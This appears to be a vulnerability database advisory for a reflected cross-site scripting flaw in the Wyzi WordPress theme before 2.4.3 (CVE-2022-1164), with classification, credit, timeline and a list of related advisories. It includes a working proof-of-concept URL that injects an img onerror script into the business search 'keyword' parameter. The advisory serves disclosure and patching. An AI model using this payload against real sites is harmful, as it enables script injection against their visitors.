Themes Vulnerabilities

Wyzi < 2.4.3 - Reflected Cross-Site Scripting (XSS)

Description

The Wyzi Theme was affected by reflected XSS vulnerabilities in the business search feature

Proof of Concept

https://example.com/business/?keyword=%22%3E%3Cimg%20src=x%20onerror=alert(/XSS/)%3Easd&wyz-loc-filter-txt=&loc-filter-txt=&loc-filter-lat=&loc-filter-lng=&category=&radius=0

Affects Themes

wyzi-business-finder
Fixed in 2.4.3

References

CVE
CVE-2022-1164

Classification

Type
XSS
OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79
CVSS
6.1 (medium)

Miscellaneous

Original Researcher
Daniel Ruf
Submitter
Daniel Ruf
Submitter website
https://daniel-ruf.de
Verified
Yes
WPVDB ID
157a9a76-3e5f-4d27-aefc-cb9cb88b3286

Timeline

Publicly Published
2021-02-06 (about 3 years ago)
Added
2021-02-06 (about 3 years ago)
Last Updated
2022-04-08 (about 2 years ago)

Other

Published
Title
Published
2016-04-12
Title
WPSOLR <= 8.6 - Unauthenticated Reflected Cross-Site Scripting (XSS)
Published
2019-08-25
Title
UserPro < 4.9.35.1 - Unauthenticated Reflected XSS
Published
2023-12-19
Title
WP Edit Username < 1.0.6 - Admin+ Stored XSS
Published
2016-10-06
Title
iThemes Security <= 5.6.1 - Unauthenticated Stored Cross-Site Scripting (XSS)
Published
2015-04-13
Title
My Wish List < 1.4.2 - Multiple Parameter XSS